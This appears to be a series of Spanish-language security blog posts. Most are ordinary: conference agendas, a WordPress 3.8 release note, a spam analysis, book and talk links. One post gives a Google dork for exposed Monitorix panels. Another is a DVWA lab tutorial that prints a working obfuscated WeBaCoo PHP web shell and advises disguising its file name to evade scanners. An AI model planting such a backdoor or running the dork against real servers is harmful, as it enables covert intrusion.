Google Hack: Buscando Monitorix

Hoy desde temprano, navegando por Internet me encontré con una nueva herramienta, por lo menos para mi, llamada Monitorix con algunas características gráficas a la hora de monitorear servidores. Lo interesante de todo esto es que tiene sus gráficos en reportes web y si está en la web es casi seguro que Google tenga indexado algunas URL's

Monitorix es una herramienta de monitorización de red que recoge periodicamente los datos del sistema y utiliza la interfaz web para mostrar la información en forma de gráficas, además permite monitorizar el rendimiento general del sistema y nos puede ser muy útil para detectar posibles anomalías en el sistema.

Monitorix es Software Libre licenciado bajo los términos de la licencia GNU/GPLv2, además utiliza las librerías RDDtool y es un script que se encuentra escrito en Perl.

Ahora que conocemos un poco más de Monitorix veamos que sabe Google de él:

inurl:"/monitorix-cgi/monitorix.cgi"

Feliz Navidad a todos

Hoy no vamos a hablar ni de hacking ni de programación, de eso vamos a tener todo un año más por delante. Hoy simplemente desearles a todos y cada uno de los geek que nos siguieron en Cacería de Spammers y en el regreso de El CoDiGo K que tengan una muy Feliz Navidad para ustedes y a los que tengan la suerte de compartirlo con familia y amigos.

Felicidades! Saludos!

The Debian Administrator's Handbook

Cada vez que alguien menciona esta obra, no puedo evitar retroceder el tiempo en mis inicios como SysAdmin, comenzando por la administración de algunos firewalls basados en iptables y un correo en Postfix, para luego continuar administrando Proxy, LAMP, Bind9, VPN  y básicamente todo lo que un Administrador tiene a cargo sobre servidores Debian.

Sin dudas este proyecto me ayudó mucho a crecer profesionalmente, aprendiendo y comprendiendo los fundamentos de muchos de sus servicios, actualizaciones de Debian, el proceso de instalación de hardenización de un servidor, configuración, etc.

The Debian Administrator's Handbook es un proyecto escrito por dos Debian Developers Raphaël Hertzog and Roland Mas, sin duda uno de los recursos más valiosos para aquellos usuarios que utilizan Debian o distribuciones basadas en él.

No dejen de colaborar con este proyecto, ya sea difundiendo su contenido o colaborando económicamente para recaudar fondos para seguir con nuevas edisiones.

Saludos!

Enlace | The Debian Administrator's Handbook

Historia de los buffer overflows - Parte 1

Hoy les quería compartir un Hangouts de Juan Sacco @juansacco, creador del proyecto OpenSource llamado Exploit Pack donde nos cuenta un poco de la historia y los inicios de los fallos Buffer Overflow en esta primera parte.

Saludos!

Enlace | Presentación de Historia de los buffer overflows

Como crear un Backdoor con WeBaCoo (2 de 2)

Segunda y última parte de esta entrega, y la idea de hoy es en primer lugar crear nuestro backdoor con WeBaCoo y lograr comprometer un servidor, para evitar meternos en problemas vamos a utilizar DVWA y en particular su fallo en el menu de Upload.

Para evitar llamar la atención en los escaneadores de archivos e incluso en el mismo mod_security, les recomiendo que utilicen un nombre para su backdoor que no haga alusión a que es un backdoor sino un archivo más.

$ ./webacoo.pl -g -f 1 -o consulta.php

        WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
        Copyright (C) 2011-2012 Anestis Bechtsoudis
        { @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }

[+] Backdoor file "consulta.php" created.

Por defecto el código queda ofuscado, pero tenemos la opción con -r de no ofuscarlo al momento de generarlo.

$ cat consulta.php
<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = "))); ?>

Actualización WordPress 3.8

Por estos últimos días, se liberó una nueva actualización del CMS más popular de la web, WordPress 3.8 “Parker”, la misma incorpora todas las actualizaciones anteriores como la 3.7 y 3.7.1

Todas las mejoras para esta nueva versión son a nivel de experiencia de usuario y hasta el momento no se dio detalle sobre fallos de seguridad, es posible en el correr de los días se publiquen algunos documentos al respecto.

La verdad que estuve trabajando todo el fin de semana con esta nueva versión, donde le da un giro 360º al panel de administración, nuevos estilos, responsive designer, nueva administración de themes y varias cosas más que estoy seguro que van a percibir aquellos usuarios que vienen trabajando con WordPress.



Por otro lado #WPHardening es totalmente compatible con WordPress 3.8 así que les recomiendo implementarlo para cerrar y fortificar su proyecto antes de enviarlo a producción o subirlo al web hosting.

Desde ya es recomendable actualizar a esta nueva versión por posibles problemas de seguridad futuros y además para tener y disfrutar de esta nueva versión 100% libre.

Saludos!

Enlace | WordPress 3.8

A&D Security Conference 2013 - Día 2 en Vivo

Live streaming video by Ustream

09:00 AM

Registración

09:30 AM

Bienvenida

09:40 AM

La Ética del Hacker Valentin Muro

10:00 AM

Auditorio 1 - Conociendo Huemul distro para informatica Forense Marcos Russo/Vampii/Gonzalo Zaccardi
Aula 1 - OpenTalks
Aula 2 - OpenTalks

10:45 AM

Auditorio 1 - Pivoting in Amazon clouds Andres Riancho
Aula 1 - OpenTalks
Aula 2 - OpenTalks

11:30 AM

Break

11:45 AM

Auditorio 1 - Uso de la Ingeniería Inversa de código en la detección de vulnerabilidades Eugenia Bahit
Aula 1 - TULZ - w3af Andres Riancho
Aula 2 - TULZ - PC táctil Daniel Dieser

12:30 PM 

Auditorio 1 - Brazilian cybercrime underground: Modus Operandi Ronaldo Lima/Aline Bueno
Aula 1 - TULZ - Secure TDD Carlos Pantelides
Aula 2 - TULZ - vScan Federico Massa

13:15 PM 

Almuerzo

14:30 PM 

Auditorio 1 - Hacking RFID Babak Javadi
Aula 1 - OpenTalks
Aula 2 - OpenTalks

15:15 PM 

Auditorio 1 - Temas avanzados de Rootkits Marcos Schejtman
Aula 1 - OpenTalks
Aula 2 - OpenTalks

16:00 PM 

Break

16:15 PM 

Hackers University: Out of The Matrix Fede Pacheco

16:45 PM 

Desde Dig a la Destrucción de RSA Cristian Amicelli

17:45 PM 

Cierre / Sorteos / Show

18:30 PM 

Fin Día 2

A&D Security Conference 2013 - Día 1 en Vivo

Live streaming video by Ustream

09:00 AM

Registración

09:45 AM

Bienvenida

10:00 AM

Los límites éticos y legales que no podés cruzar en una investigación, o sí Sebastian Bortnik

10:30 AM

Hacking Router's with FeeeBSD Alexis Sarghel / Diego Gutierrez

11:15 AM

Openpgp y HTTP: Alta fiesta? Buanzo 

12:00 AM

Break

12:15 PM 

Auditorio 1 - Workshop Fail2ban Buanzo
Auditorio 2 - Workshop Cryptography 101 Paulo Veloso

13:15 PM 

Almuerzo

14:30 PM 

Auditorio 1 - Workshop Lockpicking Babak Javadi
Auditorio 2 - Workshop Your brain, my treasure... Michael Hudson

15:30 PM 

Break

15:45 PM 

Life as a Cracker, mitos y verdades Alberto Ferrer / David de Asis

16:30 PM 

The CSO Myopia Jordan Bonagura

17:15 PM 

Facebook Hacking Tool Gustavo Ogawa

18:15 PM 

Cierre

18:30 PM 

Fin Día 1

#SPAM, no es solo un correo basura

Les quiero dejar una referencia de todos o por lo menos algunos de los factores que podemos encontrar detrás de un simple #SPAM, la idea es ver cada uno de los componentes que intervienen en este negocio rentable y que a día de hoy seguimos padeciendo todos.

La forma del SPAM

Evidentemente el SPAM siempre va a estar disfrazado de cosas que se encuentran instauradas en la actualidad, temas populares, los que se encuentra en boca de todos, recuerden que la idea es siempre enganchar al usuario (víctima) para que ingrese a algún lado, complete información, revele datos, clicke en algo, etc.

WhatsApp sin duda es un servicio que tenemos muchos y es una poderosa marca para motivarnos a la acción dentro del correo electrónico.

Pensando en voz alta

Realmente no creo que una empresa como WhatsApp, con el caudal de usuarios y el poder financiero, tenga el descuido de elaborar en su emailmarketing un correo tan pobre en contenido (horrible) y su envío sea desde una cuenta cuyo dominio no es whatsapp.com

Les voy a ahorrar el camino, comentando que clicke en “autoplay” algo que realmente recomiendo no hacer. Un redireccionamiento de IP y dominio, algo que vamos a contar unos párrafos más abajo, y sorpresa! Todo este circo armado para entrar a comprar una página de Viagra, de todo tipo de color, forma y poder sexual.

The Original Hacker Nº 2

Ya se encuentra disponible el segundo número de la revista digital The Original Hacker creada por nuestra amiga Eugenia Bahit, y en este número se encuentran varios temas de lo más interesante:

• Ingeniería Inversa: Desarrollar Software Aplicando la Ingeniería Inversa
• Python Scripting: Manipular Archivos de Configuración Mediante ConfigParser
• Ingeniería de Software: Agregado de archivos cron y ejecución periódica de procesos en los paquetes .deb
• Europio Engine Lab: ¿cómo se hicieron los ABM de la Web "The Original Hacker Library"?
• Seguridad Informática: Capas de Seguridad Inteligentes en PHP – Saneamiento del array superglobal $_POST

Sin dudas, 36 hojas para llevar a todas partes y aprovechar al máximo sus contenidos.

Saludos!

Enlace | The Original Hacker Nº 2

A&D Security Conference 2013

Este 12 y 13 de Diciembre, en la ciudad de Buenos Aires no se pueden perder de A&D Security Conference, una conferencia joven creada con el objetivo de reunir diferentes aspectos de seguridad de la información, desde una visión Ofensiva y Defensiva.

Durante el evento Profesionales de la industria hablarán sobre temas de interés y relevancia para la comunidad, siendo útil para cualquiera sea la mirada del asistente.

2 días de pura acción Hacker para cerrar el año, A&D va a contar con conferencias en simultáneo, Wargame, OpenTalks, Workshop, Desafíos forenses y la demostración de algunas herramientas de seguridad.

Para esta edición estará presente Arturo Buanzo (@buanzo), Gustavo Ogawa (@chinoogawa), Andres Riancho (@w3af), Eugenia Bahit (@eugeniabahit), Fede Pacheco (@FedeQuark) y muchos más conferencistas acompañado de toda la comunidad Hacker.

Agenda

• Round 1
• Round 2

A&D es un evento totalmente gratuito y los dos días se van a transmitir por audio-video streaming, seguramente lo vamos a estar publicando esos mismos días.

Desde ya un gran saludo para los organizadores Matias Katz, Maxi Soler, Cristian Amicelli, Nicolas Ogawa y Soledad Quijano

Saludos!

Enlace | A&D Security Conference | @andseccon

15 años de SQL Injection

En esta conferencia en la Escuela Universitaria de Informática de la Universidad Politécnica de Madrid, Chema Alonso, un una divertida charla, nos cuenta sobre la historia y la evolución de las técnicas de SQL Injection.

A disfrutar.

Saludos!